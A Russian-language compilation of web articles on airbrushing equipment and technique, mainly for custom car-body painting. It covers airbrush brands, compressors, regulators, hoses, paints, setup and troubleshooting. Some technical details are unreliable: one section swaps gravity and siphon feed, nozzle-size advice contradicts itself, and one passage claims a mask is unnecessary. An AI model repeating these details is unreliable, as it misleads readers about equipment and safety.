15 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Что нужно для аэрографии

Оборудование для аэрографии: что необходимо профессионалу?

Оборудование для аэрографии

Аэрография – это техника изобразительного искусства, при которой краска на поверхность наносится с помощью сжатого воздуха. Главное преимущество аэрографии – возможность нанесения краски на любую гладкую поверхность, в т.ч. кузов автомобиля.

Знакомьтесь, аэрография!

Аэрография приобрела особенную популярность в последние годы. С помощью аэрографии можно нанести на автомобиль рисунки любой сложности, воплощая даже самые смелые мечты и дизайнерские идеи. Великолепные пейзажи, необычные стремительные животные, разнообразные символы, герои книг и любимых фильмов – все это стало возможным нанести на автомобиль благодаря аэрографии. Это отличный способ сделать свой автомобиль неповторимым и эксклюзивным. Для того, чтобы преобразить автомобиль давайте определимся, что нужно для аэрографии:

  • Оборудование для аэрографии.
  • Набор инструментов и аксессуаров для аэрографии.
  • Знание техники нанесения краски, умение пользоваться всеми необходимыми инструментами и умение рисовать и владение основами живописи.

Оборудование для аэрографии в автосервисе

Оборудование для аэрографии в автосервисе

Самая важная часть оборудования для аэрографии – собственно аэрограф. Не стоит покупать слишком дешевый и простой аэрограф «для начала». Лучше сразу купить качественный аппарат известного производителя. Таким образом, на первых порах удастся избежать многих неприятных ошибок, например, протекание краски, брызги, кляксы и др.

Пожалуй, лучший вариант оборудования на сегодняшний день – это аэрограф японской фирмы «Iwata», которые зарекомендовали себя как надежные качественные аппарата по разумной цене. У этого производителя есть несколько серий аэрографов, отлично подходящих для проведения работ в автосервисе, например, Hi-Line, Eclipse, Custom micron и др.

Аэрограф

Инструменты для аэрографии этого японского производителя имеют ряд преимуществ:

  • Аэрограф полностью готов к работе, не нужно ничего менять и подстраивать, эксплуатацию можно начинать сразу после доставки из магазина.
  • Отличное качество полировки деталей аэрографа, что значительно повышает рабочие характеристики аэрографа и положительно сказывается на его долговечности.
  • Тефлоновые прокладки аэрографа хорошо противостоят растворяющим свойствам веществ, находящихся в красках и лаке.

Диаметр сопла отвечает за количество распыляемой краски, т.е. сопло – это своеобразный дозатор. Сопло отвечает и за толщину наносимых аэрографом линий. Таким образом, получается, что сопло диаметром 0,5 мм распыляет в два раза больше краски, чем сопло диаметром 0,25 мм.

Для работы в первое время вполне достаточно иметь один аэрограф с соплом 0,3. Такой универсальный аэрограф позволит сделать как заливку фона, так и прорисовку мелких деталей рисунка. Удачным вариантом такого аэрографа может стать модель Iwata Hp-CH.

Компрессор для аэрографии

Компрессор для аэрографии

Компрессор — еще один основной элемент, входящий в понятие оборудование для аэрографии. Желательно приобретать компрессор малошумный с ресивером. Ресивер – это небольшая емкость под компрессором, куда накапливается воздух, а затем подается в аэрограф. Компрессор автоматически отключится сразу же, как наполнится ресивер. Такая конструкция наиболее удобна, т.к. компрессор имеет возможность охлаждаться, что положительно сказывается на его долговечности. Важно обратить внимание и на мощность компрессора. Она должна соответствовать диаметру сопла.

В условиях автосервиса компрессор часто уже существует стационарный, который обеспечивает весь автосервис. В таком случае покупать дополнительно компрессор не нужно.

Существуют несколько различных вариантов компрессора для аэрографа. По сути, любой исправный компрессор или баллончик со сжатым воздухом могут стать источником воздуха для аэрографа.

  • Маленькие баллончики. Удобны, если предстоит небольшой объем работ или работы проводятся далеко от источника электропитания. Подойдет также для рисунка аэрографом в качестве пробы. Баллончики очень удобны в применении, но стоят дорого и применять их на постоянной основе просто не выгодно.
  • Электрический компрессор. Для работы ему нужен источник электричества. Самый выгодный вариант подачи сжатого воздуха, т.к. затрачивает мало энергии и, соответственно, быстро окупается. Бывает двух видов: поршневой и мембранный.
  • Поршневой электрически компрессор. Воздух в бак такого компрессора закачивается при помощи поршня. Может обслуживать одновременно несколько аэрографов.
  • Мембранный компрессор. Может быть с баком или без него. Модели без бака подают воздух сразу в шланг аэрографа, что иногда приводит к пульсации и несколько портит качество работы. Такой компрессор отлично подойдет в том случае, если арограф один и не слишком часто используется. Имеет важный положительный момент, объясняющий его популярность – имеет низкую стоимость.
  • Баллоны со сжатым воздухом. Идеальный вариант для маленьких и средних проектов. Не требует источника электропитания и не издает посторонних шумов, не требует дополнительного фильтра. Сегодня продаются баллоны разного размера, что позволяет легко подобрать оптимальный вариант.

Компрессор для аэрографа, как и любой другой компрессор, может подвергнуться перегреву и испортить рисунок. Чтобы такого не случилось, компрессор должен соответствовать аэрографу, желательно включать его прямо в розетку, не используя удлинитель, должен иметь автоматическую систему отключения при перегреве.

Регулятор давления

Регуляторы давления призваны контролировать давление, под действием которого подается краска. Могут устанавливаться на компрессор, либо непосредственно на шланг, идущий к аэрографу. С помощью такого регулятора легко можно корректировать давление в зависимости от вида производимых работ. Многие современные аэрографы, в частности модель Iwata HP-CH, уже имеют регулировку давления на своем корпусе.

Металлический регулятор давления.

Такие инструменты для аэрографии используются только в том случае, если источником воздуха для аэрографа служит баллон со сжатым воздухом, в этом случае регулятор давления от компрессора не подойдет (просто может не выдержать нагрузку). Такие регуляторы созданы для работы с небольшими баллонами, в противном случае, регулятор нужно будет постоянно нагревать.

Служит для того, чтобы собирать лишнюю влагу, образующуюся при работе компрессора. Особенно актулен для компрессоров без бака. Если такой прибор не будет установлен, то постепенно влага из компрессора конденсируется и попадает в шланг и в аэрограф, который, в свою очередь, начинает выдавать краску с большими каплями и кляксами.

Масляный фильтр

Используется только для масляных компрессоров, чтобы исключить попадание масла в аэрограф.

Шланги для аэрографа

Шланги для аэрографа

Использовать можно все виды шлангов как для работы с баллонами, так и компрессорами. Шланги различаются материалом, из которого они изготовлены: пластиковый или резиновый. Резиновые шланги, покрытые нейлоновой тканью, более долговечные, чем резиновые. Длина шлангов 2-6 метров. Для небольших проектов достаточно 3-х метрового шланга. Существуют также спиральные шланги, но они не удобны в работе, т.к. имеют свойство собираться и закручиваться, сильно мешая процессу рисования.

Редуктор

Инструменты для аэрографии существуют различные, но есть такие, без которых сложно обойтись, редуктор относится к их числу. Редуктор – это универсальный прибор, который одновременно является регулятором давления воздуха, манометром, влагоотделителем и переходником к разъему для аэрографа, т.е. заменяет собой отдельные эти приборы. Регулировка давления располагается сверху, соединение с шлангом – слева, соединение с компрессором – справа, индикатор, контролирующий давление – в центре, колба для лишней влаги – визу.

Какие аксессуары для аэрографии понадобятся?

В ообще, аксессуары для аэрографии не являются необходимыми, но они очень удобны и способны значительно облегчить процесс рисования, особенно новичкам.

Аксессуары для аэрографии

Держатель для аэрографа и компрессора

Крепится такой держатель прямо к рабочему столу. Делает удобным использование аэрографа, благодаря нескольким имеющимся стандартным положениям, например, аэрограф можно закрепить вертикально, как авторучку. Регулятор давления в таком держателе крепится к кольцу. Держатель надежно защищает прибор от падения и повреждения.

Планшет

Еще один аксессуар, созданный специально для новичков. Представляет собой 3-5 миллиметровый металлический планшет, покрытый лаком и краской, по своей структуре очень похожий на капот автомобиля. На нем можно потренироваться и набить руку для того, чтобы без страха приступить к реальной работе на кузове автомобиля. Также планшет можно использовать для пробы нового рисунка или освоения техники нанесения краски, любые опыты легко удаляются с планшета растворителем.

Автоэмали для аэрографии

Автоэмали для аэрографии

Эти аксессуары для аэрографии из серии аксессуаров, на которых не стоит экономить. Качественные краски для автомобилей стоят достаточно дорого, но и полученный результат намного отличается от картинки, созданной дешевыми красками. Некоторые некачественные эмали после отвердения становятся морщинистыми, что сильно портит рисунок, также цвета, заявленные на таких красках, редко совпадают с теми, что реально получаются. Выбирая автоэмаль лучше отдавать предпочтения проверенным маркам и производителям, например, Standox, PPG, Brulex и др.

Некачественные краски не только могут существенно испортить результат работы, но и просто испортить аэрограф. Некоторые акриловые краски после затвердевания не отмываются никакими растворами, понятно, что на пользу аэрографу это не пойдет.

Ножи и коврики

Такие аксессуары для аэрографии применяются для резки трафаретов и некоторых других работ. Не являются обязательными, но являются очень приятными и часто нужными предметами, делают процесс резки более безопасным и простым.

Аксессуары для чистки аэрографа

Существуют и такие. Необходимы в крайнем случае, но если беда случилась, то без них не обойтись. Выпускаются в виде различных ершиков, спиц для чистки каналов краскопульта и т.д.

Мерные емкости

Наверно, самый бесполезный аксессуар, хотя новичкам на первых порах также может быть весьма полезен.

Оборудование для аэрографии в домашних условиях

Оборудование для аэрографии в домашних условиях

Для аэрографии в таких условиях понадобится такое же оборудование, как и для аэрографии в условиях автосервиса. Единственное отличие заключается в том, что в домашних условиях никак не получится использовать шумный компрессор, поэтому единственный выбор – это бесшумный компрессор с ресивером или маленькие сменные баллончики со сжатым воздухом.

Обзор оборудования для аэрографии

Нанесение аэрографии на авто

Практика нанесения красочных изображений на автомобили в последнее время приобрела широкое распространение. Аэрография явилась лучшей технологией, позволяющей передать практически любую дизайнерскую идею, какой бы сложной в цветовом исполнении она не была. Но для того, чтобы изображение получилось эффектным и радовало глаз владельца автомобиля не один год, необходимо использовать профессиональное оборудование для аэрографии.

Почему аэрография?

Современная аэрография подразумевает создание изображений путём нанесения краски, подающейся под давлением вместе со струёй сжатого воздуха. Преимуществом такой технологии является возможность работы с любыми типами поверхностей, в том числе и гладким кузовом автомобиля. При грамотном использовании оборудования можно добиться плавного перехода цветов и получения всевозможных оттенков путём смешения слоёв краски. Другим преимуществом аэрографии является возможность избежать подтёков, способных испортить впечатление даже от самого искусного рисунка.

Аэрограф в руке профессионала превращается в волшебную кисть, с помощью которой на автомобиле появляются захватывающие дух пейзажи, герои любимых фильмов или стремительные животные, подчёркивающие характер и внутренний мир владельца машины, делая её уникальной и узнаваемой.

Мы подошли к главной теме статьи, в которой рассмотрим, какое оборудование для аэрографии нужно использовать для создания качественных изображений.

Аэрограф

Аэрограф (от лат. aero grapho — писать воздухом) — пневматический пульверизатор, распыляющий краску или чернила. Внешне очень похож на авторучку, к которой с одной стороны прикреплена ёмкость с красящим веществом, а с другой подведён шланг со сжатым воздухом. Изменяя давление подаваемого воздуха, можно получать различную толщину покрытия, изменять интенсивность цвета.

Не стоит экономить на приобретении аэрографа, даже в начале . Для того, чтобы быстро набить руку и получить необходимые навыки, нужно начинать тренироваться на хорошем, профессиональном аппарате. Сделав выбор в пользу профессионального аэрографа, вы сможете избежать таких проблем, как появление подтёков, клякс и неконтролируемых струй краски.

Общепризнанным лидером на сегодняшний день является аэрограф от «Iwata» — японской фирмы, зарекомендовавшей себя как производителя надёжных аппаратов, предлагаемых по разумным ценам. В модельном ряду Iwata представлен целый ряд аэрографов, отлично справляющихся с покрасочными работами в автосервисе.

Почему Iwata? Аэрографы данной фирмы обладают целым рядом преимуществ:

  • Прибывший из магазина инструмент полностью готов к работе и не требует от мастера никаких манипуляций и настроек;
  • Все элементы аэрографа качественно отполированы, что делает его не только приятным на вид и удобным в эксплуатации, но и повышает срок службы аппарата.
  • Подвижные соединения инструмента имеют тефлоновые прокладки, способные противостоять едким веществам, содержащимся в лаке и краске. Это гарантирует защиту от протеканий и неконтролируемых брызг.

Аэрограф распыляет краску через отверстие, именуемое соплом. Его диаметр определяет скорость подачи красящего вещества и толщину наносимого слоя. Так, сопло диаметром 0,4 мм распылит в двое больше краски, нежели сопло диаметром 0,2 мм. Таким образом, данное отверстие выступает в роли своеобразного дозатора, отвечающего за скорость и стиль работы.

Начинающему в аэрографии будет достаточно одного аэрографа с соплом 0,3 м («золотая» середина; например, модель Iwata Hp-CH).

Такая модификация позволит без труда выполнять как заливку фона, так и прорисовку мелких элементов рисунка. С данным аэрографом можно освоить тонкости работы и, основываясь на собственных ощущениях, сделать выбор в пользу большего или меньшего диаметра.

Компрессор

Следующим незаменимым инструментом для аэрографии выступает компрессор, подающий воздух под давлением в аэрограф. Рекомендуется приобретать малошумный компрессор, оснащённый ресивером — небольшой ёмкостью, служащей для накапливания воздуха перед его отправкой в аэрограф. Как только ресивер наполнится, компрессор перестанет нагнетать давление и начнёт охлаждаться, одновременно экономя электроэнергию. Нужно внимательно отнестись к мощности компрессора для аэрографии, так как от неё будет зависеть допустимый диаметр сопла.

Компрессор для аэрографии

Рассмотрим основные типы компрессоров, используемых в аэрографии. В их роли может выступить любой исправный компрессор, используемый в другой сфере деятельности, а так же баллончик со сжатым воздухом. Главное, чтобы у них была возможность регулировки мощности воздушного потока.

  • Миниатюрные баллончики. Идеально подойдут для небольшого объёма работ, либо в условиях, где нет доступа к электрической сети. Их удобно использовать для пробного рисунка аэрографом. Главным минусом баллончиков, перевешивающим все достоинства, является их высокая стоимость;
  • Электрический компрессор. Он использует для работы постоянный источник электричества. Такой компрессор будет наилучшим вариантом для автосервиса в силу его экономичности и быстрой окупаемости. Представлен двумя типами аппаратов: поршневым и мембранным;
  • Компрессор поршневой. Воздушный бак в нём наполняется за счёт движений поршня, мощности которого хватает для одновременной работы нескольких аэрографов;
  • Компрессор мембранный. Выпускаются как с баком для воздуха, так и без него. Последний вариант подразумевает прямую подачу воздуха по шлангу в аэрограф, что может привести к неравномерному распылению краски из-за перепадов мощности. Зато такой агрегат стоит значительно дешевле других;
  • Баллоны, наполненные сжатым воздухом. Отлично подойдут для выездных работ, где поблизости нет розетки. Выпускаются различных объёмов, что позволяет выбрать наиболее подходящий для конкретного случая.

Регулятор давления

Данный прибор служит для регулировки давления подающейся краски. Возможна установка либо на выходе из компрессора, либо на шланг, подключаемый к аэрографу. Смена давления позволяет подстроиться под задачи различных видов покрасочных работ. Металлический регулятор (повышенной прочности) незаменим, если в качестве источника воздуха выступает баллон со сжатым воздухом. Регуляторы, применяемые при работе с компрессорами, могут просто не выдержать столь высокую нагрузку.

Влагоуловитель

Собирает лишнюю влагу из шланга, ведущего от компрессора к аэрографу.

Особую значимость обретает при работе с компрессором без накопительного бака. Если в этом случае данный прибор не будет установлен, мастер аэрографии рискует испортить свой рисунок из-за влаги, которая постепенно доберётся до сопла и разбавит краску. Мало того, многократно возрастёт риск появления крупных капель и клякс.

Редуктор

Является ещё одним важнейшим аппаратом, входящим в базовый комплект для аэрографии. Выполняет сразу несколько функций: регулирование давления воздуха, измерение давление (манометр), влагоотделение. Кроме того, служит переходником от шланга к разъёму аэрографа. Благодаря своей многофункциональности заменяет целый набор вспомогательных инструментов.

Шланги для аэрографа

В аэрографии выполняют роль связующего звена между источником сжатого воздуха и самим распылителем. Любой вид такого шланга совместим для работы как с компрессорами, так и с баллонами. Могут быть либо резиновыми (обычно покрыты нейлоновым волокном), либо пластиковыми, иметь различную длину. 3-метровый шланг будет идеальным решением для небольшого проекта. Не нужно приобретать шланги, закрученные в спираль, так как они имеют свойство перекручиваться, мешая тем самым процессу покраски.

Соединительные шланги для аэрографии

Масляный фильтр

Необходим при работе с масляным компрессором, имеющим существенный недостаток — попадание капель масла в шланг для аэрографии.

Помимо основного оборудования мастеру понадобится целый набор акссессуаров, таких как держатель для аэрографа, специальный планшет (для тренировки и «пробы» струи), мерные ёмкости, приспособления для чистки аэрографа и, конечно же, комплект автоэмалей.

Что такое аэрограф и как им правильно пользоваться?

Автор: Анастасия Исакова · Опубликовано 28.05.2018 · Обновлено 03.10.2019

Для росписи и создания небольших рисунков на различных поверхностях обычно используют простые кисти, но обработка аэрографом и краскопультом в большинстве случаев позволяет добиться гораздо лучшего результата. Правильно настроенный инструмент поможет расписать стены, декорировать фасад, забор или кузов машины. Но не многие новички знают, как пользоваться аэрографом. Для начала необходимо разобраться в его характеристиках и принципах работы.

Характеристики аэрографа

Аэрографом называют приспособление, которое работает по принципу распыления краски в своеобразном «факеле», образованного воздухом в растворе с мелкими частичками вещества. Устройство аэрографа регулирует подачу этого раствора, что позволяет наносить его тонким слоем на обрабатываемое покрытие.

Качественный инструмент при грамотном применении распыляет краситель узкой струей до 2 мм, так что надевать маску во время обработки не потребуется.

Существует два основных типа аэрографа – одиночного и двойного действия. Первый при использовании управляет только воздухом, второй управляет подачей воздуха и краски. Инструменты одиночного действия просты в использовании, стоят недорого и имеют небольшое количество элементов, которые легко очищать. Но с их помощью не получится нанести маленькие пятна или полоски, также они трудно регулируются.

Работа с аэрографом двойного действия позволяет произвести более точную работу, но такое приспособление стоит дорого и содержит большое количество компонентов, за которыми нужен тщательный уход. Очистка этих деталей – довольно трудоемкая процедура.

На видео: типы управления аэрографом.

Критерии выбора

Выбор инструмента зависит от того, какие виды аэрографии будут выполняться. Обычно применяются недорогие аэрографы с тонким соплом и иглой. С таким устройством смогут работать даже новички. Но те, кто хотят заняться аэрографией на профессиональном уровне, должны при выборе учитывать следующие моменты:

  • Объем бачка для красителя. Лучше всего если он будет от 2 мл;

  • Уплотнение иглы и сопла – рисование будет более комфортным, если уплотнители будут выполнены из тефлона;
  • Диаметр сопла в качественных аэрографах должен быть минимум 2 мм;

  • В устройстве должны легко заменяться основные компоненты, такие как бачок, триггер и сопло;

  • Защита уплотнителей от воздействия применяемых реагентов;
  • Возможность регулировки давления и подачи краски.

Покупка инструмента с учетом всех критериев позволит выполнять качественную и красивую покраску любой поверхности.

Какую использовать краску?

Что нужно для аэрографии? Для рисования на поверхностях используются специальные краски, которые позволяют сделать аэрографию комфортным и простым занятием. При их выборе необходимо учитывать тип поверхности и давление, с которым они будут подаваться. Наиболее популярными являются следующие разновидности красок:

  • Полиуретановые. Такие составы для аэрографа должны быть на водной основе. Они позволяют нанести прочный, быстросохнущий рисунок, который сможет выдержать разные температуры. Во время покраски такой смесью использовать средства защиты не понадобится, выполнять работу можно как снаружи, так и внутри помещения.

  • Водорастворимые акриловые. Такие смеси в виде жидкости позволяют работать на любой поверхности. Покраска аэрографом поможет украсить стены внутри здания, нарисовать узоры на фасаде или автомобиле. Акриловые краски подойдут для начинающих художников, так как они просты в использовании, быстро высыхают, являются экологически безопасными и при правильном применении позволяют создать хорошее произведение.

  • Акриловые сольвентные. Как красить аэрографом с такой смесью? Перед применением состав понадобится разбавить специальным растворителем, который обычно идет в комплекте. Пользуясь такой разновидностью краски, нужно обязательно надевать защитную одежду, так как смесь является токсичной. Рисовать аэрографом с сольвентным раствором новичкам не рекомендуется, как правило, состав такого вида используется в профессиональных мастерских.

На видео: как растворять акриловые караски под аэрограф.

Подготовка к росписи

Перед тем как начать творческий процесс, необходимо выполнить ряд подготовительных мероприятий:

  • Выбор эскиза. Необходимо продумать, как рисовать узор, и какой результат должен получиться в итоге. На бумагах создаются наброски и из всех рисунков выбирается нужный вариант.
  • Подготовка поверхности. Участок, который будет подвержен рисованию, необходимо очистить от грязи, пыли и ржавчины. Если планируется создать узор на кузове авто, то без процедуры обезжиривания не обойтись, для этого используйте спирт, уайт-спирит или универсальный обезжириватель.
  • Подбор материалов. Красящий раствор, который будет использоваться в работе, должен подходить для нанесения на определенную поверхность.
  • Настройка инструмента. Перед тем как настроить аэрограф, изучите аннотацию в инструкции, которая идет в комплекте. Настройки могут довольно сильно отличаться, в зависимости от разновидности прибора.

Правила работы с аэрографом

Аэрографом пользуются даже неопытные мастера, потому что работать с ним несложно. Конечно, для начала стоит изучить принцип работы аэрографа и его особенности, но это не отнимет много времени. Как правильно использовать такой инструмент? Чтобы добиться хорошего результата при рисовании, понадобится соблюдать следующие правила:

  • Работая с аэрографом, начинать покраску лучше на пробном участке. В некоторых случаях, если работники неправильно настроили прибор, он может выстреливать сгустками краски, а это испортит композицию. Поэтому будет лучше, если процедура начнется на картоне или бумаге.
  • Струя краски должна наноситься аккуратными равномерными движениями, это позволит избежать образования потеков или других дефектов при покраске.
  • Держать инструмент слишком близко к поверхности не рекомендуется, так как слой краски ляжет неровно, что приведет к образованию потеков.
  • После завершения работы инструмент нужно обязательно отмыть от красителя, иглу и сопло также нужно очистить растворителем. Он подбирается исходя из состава используемой краски.

Дополнительные рекомендации

Выяснив, как работает инструмент, можно красиво украсить различные поверхности. Следующие рекомендации облегчат использование аэрографа для начинающих:

  • Когда мы красим, инструмент лучше держать перпендикулярно обрабатываемой поверхности. Чтобы красящее вещество распределилось равномерно, угол нанесения красителя должен быть больше 45°, оптимальный – 90°.
  • Интенсивность наносимого тона, толщина слоя и общий результат зависят от расстояния между инструментом и обрабатываемым покрытием. Когда работник рисует, он может менять это расстояние, но делать это следует аккуратно и плавно.
  • Когда мы рисуем, могут образовываться небольшие потеки, но удалять их сразу необязательно. Рисункам нужно дать время на высыхание, после чего излишки аккуратно зачищаются наждачкой.
  • Чтобы ускорить процесс рисования, нужен дополнительный бачок для краски с другим цветом, тогда смена палитры не отнимет много времени. Очищать емкость не потребуется, достаточно промыть инструмент и прикрепить к нему другой бачок с красителем.

Как видно, аэрография не отличается высокой сложностью, но позволяет создать удивительные росписи. Профессионалы, которые работают с таким инструментом много лет, могут выполнять 3d изображения. Но и новичок, который недавно освоил принцип рисования аэрографом, также сможет без проблем декорировать фасад, забор, автомобиль и другие поверхности.

Настройка аэрографа и советы по уходу (2 видео)

ТОП 4 аэрографов — что это такое, принцип работы, инструкция приминения

С появлением новых синтетических красителей быстро развивается аэрография – одна из техник нанесения рисунка. Вместо кисти или карандаша художник рисует специальной машинкой.

Инструмент, который распыляет краску тонким слоем, вот что такое аэрограф. С его помощью создаются живописные картины, расписываются фасады домов, заборы, наносятся стилистические узоры на автомобили и мотоциклы. Благодаря специфике нанесения красителей можно создавать объемные панорамы с имитацией грубой фактуры на абсолютно гладкой поверхности.

Что это такое

Покраска аэрографом не требует специальных знаний. Художникам инструмент нужен для создания плавного перехода цвета при росписи текстиля, для быстрого достижения фотографических иллюзий при нанесении рисунка на посуду, автомобильный кузов и пр.

Устройство

Устройство аэрографа имеет конструктивное сходство с краскопультом, который широко применяется при всех лакокрасочных работах в автомобильных мастерских. Приспособление предназначено для тонких работ, где упор делается на минимальном размере проводимых линий с минимальной толщиной наносимой краски на рабочую поверхность.

В стандартную комплектацию входят:

  • емкость для красок;
  • пусковые кнопки или ручки;
  • регулирующий узел (кнопка);
  • сменные сопла;
  • игла.

К дополнительным элементам машинки, которые предназначены для упрощения работы художника, относятся:

  • подставка под устройство;
  • держатель для аэрографа;
  • компрессор;
  • воздушный шланг;
  • фильтр для рабочей среды;
  • Аэрограф комплектуется сменными соплами. От размера распылительного узла зависит толщина наносимого пятна краски и его ширина. Компрессор подает воздух под большим давлением, позволяя быстро закрашивать большие поверхности и создавать тонкие переходы цвета и плавные линии.

Инструмент высокого качества имеет в комплекте не менее двух видов насадок, сопла различного диаметра и несколько сменных игл.

Как работает

Принцип работы аэрографа независимо от типа смешения краски, подачи и конструктивных особенностей основан на энергии сжатого воздуха. Нажатие на регулятор воздушного клапана – триггер – по шлангу через компрессор в прибор подает сжатый воздух под высоким давлением. Перемешанный с краской, на выходе из сопла он образует струю необходимой ширины и консистенции.

Виды аэрографов

Конструктивно аэрограф различается по типу смешения краски:

  • внутреннего смешивания;
  • наружного.

В зависимости от подачи раствора бывают гравитационные и сифонные, а по порядку регулировок прохода воздуха и красителя – одинарного или двойного действия. Виды аэрографов классифицируют по типу пускового управления:

Проточные и запираемые

Проточная конструкция работает без возможности регулировать распыление. После включения компрессора художник может только останавливать или запускать струю краски, не настраивая давление. На проточном принципе управления работают современные краскопульты. Запираемая конструкция аэрографа позволяет корректировать проход непосредственно триггером на корпусе.

В запираемой конструкции есть дополнительная система расхода красителя, это позволяет наносить слои необходимой плотности и толщины.

Внутреннего и наружного смешения

Краскопульт для аэрографии с внутренним типом смешения имеет дополнительные патрубки, которые вмонтированы в корпус. Краска образует смесь с воздухом внутри прибора, что позволяет строго дозировать расход смеси. Регулировка обеспечивается точным ходом иглы. Выбрав необходимый цвет автомобильной краски, создают точные мелкие рисунки на крыльях, капоте машины.

Точность нанесения рисунка зависит от положения иглы и надежности ее фиксации.

Наружное смешение используется в простых конструкциях. Этот инструмент доступен для начинающих художников. Краска распыляется без дополнительных внутренних регуляторов, состав смешивается с потоком воздуха и выходит из сопла равномерным потоком. Покраска авто или создание рисунков аэрографом такого типа позволяет получить равномерное покрытие одинаковой толщины и насыщенности цвета.

Одинарного и двойного действия

По типу регулировки прохода аппарат для аэрографии может быть одинарного или двойного действия. При одинарном у художника есть возможность регулировать только подачу воздуха. Подкраска сколов и ремонт царапин на СТО проводится одинарным инструментом. Управление происходит за счет регулятора давления, расположенного на рукоятке прибора.

Использование аэрографа одинарного действия обеспечивает минимальный расход красителя и равномерную плотность покраски на больших площадях.

При двойном действии предполагается одновременная регулировка как воздушного потока, так и расхода красителя. На рынке представлены образцы из Китая с независимой двойной регулировкой, когда художник самостоятельно выбирает расход материала и силу давления воздуха.

Типы подачи

В зависимости от расположения емкости с краской прибор имеет:

  • сифонную подачу;
  • гибридную;
  • гравитационную.

При гравитационном типе подачи бачок устанавливается в нижней части устройства. Под действием движения воздуха через работающий аэрограф создается разность давления в корпусе и установленном бачке, которая поднимает краску.

При сифонной установке емкость с краской расположена наверху прибора. Рабочая среда поступает в корпус под действием силы тяжести, после перемешивания с воздухом из сопла выходит равномерная струя.

При сифонной подаче начинающим мастерам лучше использовать вместо компрессора воздушную грушу: это позволит за короткое время освоить принцип управления.

Художники, предпочитающие создавать картины на большой площади в стиле арт, выбирают сифонные конструкции. Мастера кузовной аэрографии отдают предпочтение гравитационной подаче краски на сопло диаметром не более 0,2 мм.

Красить аэрографом с подачей гибридного типа можно красителями максимальной плотности. Разница в методах основана на использовании избыточного (лишнего) давления. При такой конструкции бачок с краской может устанавливаться вертикально (сверху или снизу прибора), под углом либо горизонтально.

Как выбрать

Чтобы правильно выбрать аэрограф, учитывают следующие параметры:

  1. Аэрограф, работающий от компрессора, требует внешнего источника питания. Оборудование, работающее от баллонов, можно укомплектовать узлами регулировки давления, подачи воздуха.
  2. Воздушный шланг должен быть резиновым, в пластиковой оплетке, достаточной длины.
  3. Китайские аэрографы часто оснащаются редуктором давления. Это позволит ограничить максимальное давление на прибор, обеспечить динамичность воздушного потока.
  4. Качество уплотнителей. Выбираем пластиковые уплотнители для работы с акриловыми красками (японское производство).

При выборе модели учитываются:

  • наличие рукоятки;
  • размер, вес прибора;
  • объем контейнера для красителей (не менее 2 штук от 2 мл);
  • количество насадок;
  • наличие тефлонового уплотнителя для иглы;
  • количество регуляторов.

Iwata

Японские аэрографы Iwata изготавливаются из нержавеющей углеродистой стали, хромированной латуни, неподвластной коррозии, с тефлоновым уплотнителем. Ручная сборка, разновидности, проверка настроек распылителя позволяют использовать инструмент для создания точных рисунков в самых разнообразных сферах: боди-арт, аэрография кузова, роспись текстиля, фарфора.

Fengda

Аэрографы Fengda (производитель КНР) выбирают мастера в своем деле, также их предпочитают те, кто лишь недавно начал осваивать искусство аэрографии. Для аппаратов характерна простота использования в СТО для кузовного ремонта, при покраске фасадов, больших площадей, минимальная функция регулировки.

В модельном ряду присутствуют все конструктивные типы. Не рекомендуется использовать для создания мелких рисунков. Уплотнитель иглы нуждается в частом ремонте.

Jonnesway

Аэрограф Jonnesway (Тайвань) изготавливается из хромированной стали, для игл предусмотрено титановое исполнение. Компания имеет собственные сталелитейные цеха, специализируется на изготовлении ремонтных наборов, ключей для автомобилей практически всех моделей. Изготовление аэрографов относится к смежным производством, поэтому выбор моделей Jonnesway, имеющих высокий спрос, ограничен.

Плюсы моделей профессиональных аэрографов Sata завлючаются в точности распыления, качестве материала, минимальном весе.


Как пользоваться

Настройка прибора, подготовка и выбор поверхности — необходимые шаги для овладения аэрографом. Достаточно 3-5 часов, чтобы научиться правильно пользоваться инструментом. Подготовка включает в себя:

  1. Подключение шланга подачи воздуха к компрессору.
  2. Установку бачка с краской.
  3. Продувку сопла струей воздуха.

При замене цвета следует всегда продувать сопло растворителем, чтобы избежать неровного цвета рисунка. Тренироваться лучше всего на листе картона или использовать для работы трафарет.

Почему плюется краской

Настройка аэрографа требует внимательности, осторожности при фиксации насадки. В комплекте предусмотрен ключ для установки сопла с резьбой. Конусообразную насадку устанавливают через отжатие колпачка.

Если резьбовая насадка с соплом установлена со смещением, происходит перекос в системе подачи воздуха. Давление снижается, прибор может выдавать не равномерную струю, а плеваться краской. Среди возможных причин в нарушении подачи выделяют:

  • забитое сопло;
  • в красителе попадаются плотные куски, неравномерная консистенция;
  • недостаток, избыток давления;
  • недостаточная фиксация иглы, изношенный уплотнитель;
  • неправильно подобранная консистенция красителя.

Чем меньше сопло, тем менее густой должна быть выбранная краска. Чем гуще выбирается краситель, тем больше давление должен подавать компрессор.

Настройка

Правильно настроенный инструмент превратит процедуру покраски или росписи в приятное хобби. Перед началом работы обязательна настройка:

  • Проверяется стабильная подача сжатого воздуха выбранного давления.
  • Устанавливается емкость с краской той консистенции, которая подходит для выбранного сопла.
  • Настройка производится через перемещение иглы.
  • Если при нажатии на триггер аэрограф не подает струю, следует ослабить фиксатор иглы.
  • Если при малейшем прикосновении к рукоятке начинается распыление, следует передвинуть иглу вперед с помощью регулировочного винта.

Как красить

Можно овладеть аэрографом на полупрофессиональном уровне после нескольких часов тренировок. Как новичку пользоваться аэрографом:

  1. Не следует распылять состав на одной точке более секунды: краска может потечь.
  2. После установки бачка с красителем следует проверить качество струи на черновом материале (кусок картона).
  3. Нельзя подносить сопло вплотную к рабочей поверхности. Минимальное расстояние – 2 мм.
  4. Чем дальше держать сопло от рабочей поверхности, тем шире получится точка рисунка, ее контуры будут размыты.
  5. Для точной прорисовки элементом рекомендуется брать самый маленький диаметр сопла и держать аэрограф на минимально допустимом расстоянии.
  6. Угол наклона струи к рабочей поверхности должен максимально приближаться к 90°.

Аэрографом пользуются для рисования, однотонной покраски, с его помощью можно создавать оптические иллюзии на абсолютно ровной поверхности. Это удобный инструмент для ремонта ЛКП и создания аэрографии при оформлении кузова.

Что нужно для аэрографии

Войти

Когда создавалось комьюнити я совершенно не предполагал что основной интерес в нем вызовут обзоры аэрографов, а так же все что связано с аэрографией, но… вопросы посыпались пачками и чтобы от них избавиться придется опубликовать здесь коротенькие и универсальные ответы… типа FAQ 🙂

Вопрос первый и наверное самый актуальный. Только за этот год ко мне с ним обратились более 30 человек.
ПОКУПАЕМ АЭРОГРАФ В ПЕРВЫЙ РАЗ.

